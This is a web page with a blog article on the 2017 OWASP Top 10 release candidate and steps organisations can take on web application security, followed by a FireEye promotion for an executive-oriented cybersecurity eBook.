Enter the OWASP Top 10, the most famous project of the Open Web Application Security Project (OWASP). A release candidate of the 2017 OWASP Top 106 is out and due to be finalized in November. This new version updates the 2013 list by combining two old items, “Insecure Direct Object References” and “Missing Function Level Access Control,” into a new item called “Broken Access Control.” Another change is the dropping of item 10, “Unvalidated Redirects and Forwards,” which is still a risk but considered less of a problem than it was in 2013. With these two modifications, the OWASP Top 10 has room for two more items: “Insufficient Attack Protection” and “Unprotected APIs.”

These changes have generated a few unenthusiastic industry reactions, among them complaints that some of the new items are too broad or just plain unnecessary. OWASP, for its part, has done well in working through this feedback with a call for additional data and by extending the list’s release until November 2017. None of their work on the Top 10 is secret, so anyone is free to review and comment.

Beyond understanding the OWASP Top 10 security risks in relation to the web applications your organization builds and uses, what else should you be doing? There are a few simple steps you can follow to ensure long-term upkeep of OWASP issues.

1. Understand your OWASP scope.

OWASP is already part of numerous compliance requirements and contractual obligations. Review your legal agreements and regulatory environment to see what you might be legally obligated to do with OWASP. This may entail talking to your legal department and/or reviewing the contracts with them. There are numerous international security standards related to compliance that reference the OWASP Top 10, and you may fall under one or more of them. It’s better to know now than have an unpleasant surprise later.7

2. Scan all web applications.

Scan and test all the web applications your organization depends on against the OWASP Top 10. This means anything you’ve written and anything you use. If you’re using a third-party web application and depend on it, ask the vendor for a copy of their latest web application vulnerability test. If they don’t have one, speak to Legal about getting that requirement added to the next contract. If they haven’t done a scan, it’s likely they aren’t paying attention to vulnerabilities at all and that their application already has holes you don’t know about.

3. Share results.

Share your findings of the previous two steps with your company’s executive decision makers (at the very least, the CIO) as well as the development engineering team. Make sure your messaging is appropriate for each audience. Executives want to hear the bottom line regarding business risk and dependency, not technical detail. Developers want technical detail, especially the specific steps on how the vulnerability can be exploited and what an attacker can do with it.

4. Educate and inform.

Your web developers should be familiar with the OWASP Top 10, and OWASP Top 10 training may be contractually required by your company. Beyond telling the developers about the obligations and vulnerabilities you found, you should educate them on the entire OWASP Top 10 list. You can take this a step further and draft a security policy regarding web application security to help inform the entire technical and operational staff of its importance. Some of the key elements of such a policy can include:

  • All Internet-facing web-based applications will be tested against the OWASP Top 10 vulnerabilities at least once a quarter.
  • A secure coding standard based on industry best practices will be followed.
  • Developers will have adequate security training in the OWASP Top 10.
  • Developers will use threat modeling to look for common attacks, such as those described in the OWASP Top 10, to ensure their applications can defend against them.
  • IT will ensure that test data, default accounts, and passwords are removed or changed when web applications are deployed live.
  • Security vulnerabilities will be tracked, risk-reviewed, and fixed.
  • Periodic reviews and auditing will be done against this policy.

5. Firewall what you can’t fix.

Web application security can leverage specialized defensive tools, like web application firewalls that are specifically designed to analyze and block application attacks. They go beyond standard firewalls in that you program them to match the unique application requirements of your website. Some can also take data feeds from web application vulnerability scanners and do “virtual patches” by blocking previously uncovered but unmatched web vulnerabilities. The downside is that web application firewalls are complex and require customization to function correctly, but a lot of that work could be outsourced.

6. Become part of the OWASP community.

Join OWASP, attend a meeting, or, at the very least, review some of their material. The OWASP Top 10 is just a tiny part of the material generated by thousands of individuals and hundreds of companies over nearly two decades. There’s a lot of useful and inspirational material on their site.

Do you have issues with how the OWASP Top 10 list looks? Share your thoughts and contribute at

In general, the OWASP Top 10 falls into the category of “Basic stuff you should be doing so you don’t look negligent if you get hacked.” It represents the minimum level of web application security that you need to meet. Don’t get stung.









Author: Ray Pompon

  • 0

The CyberAvengers Playbook

Category : FireEye

The Non-Technical, No Nonsense Guide For Directors, Officers, and General Counsels

Cybersecurity, as many organizations practice it today, is broken. Everybody is feeling the pressure as competitors and partners alike dread a breach. Leadership can’t be left in the dark due to technobabble, a lack of resources, or excuses as to why cyber risk cannot be measured.

FireEye is proud to support the new eBook, The #CyberAvengers PlaybookDoing the Little Things (and Some of the Big Things) Well (2017 Edition). This short guide is designed to give you actionable items that could help any organization improve its cybersecurity posture.

Download the eBook and pick up the following tips from the #CyberAvengers:

  • Oversight duties: Learn to view risk from an enterprise perspective in an era where accountability and fallout costs are surely going to grow.
  • Cyber risk: Why it matters and how to wisely spend your limited resources.
  • Communication gaps: Cybersecurity is not an IT-only issue, so do not be afraid to speak your mind. We show you which questions to ask.
  • Response and continuity: Even the best-tested plans can go out the window during a time of crisis. Learn to minimize the fallout.
  • What’s happening in 2017 and what to expect in 2018: From the ransomware scare to the General Data Protection Regulation (GDPR) coming into effect, business is becoming more expensive. We try to help you save wherever you can.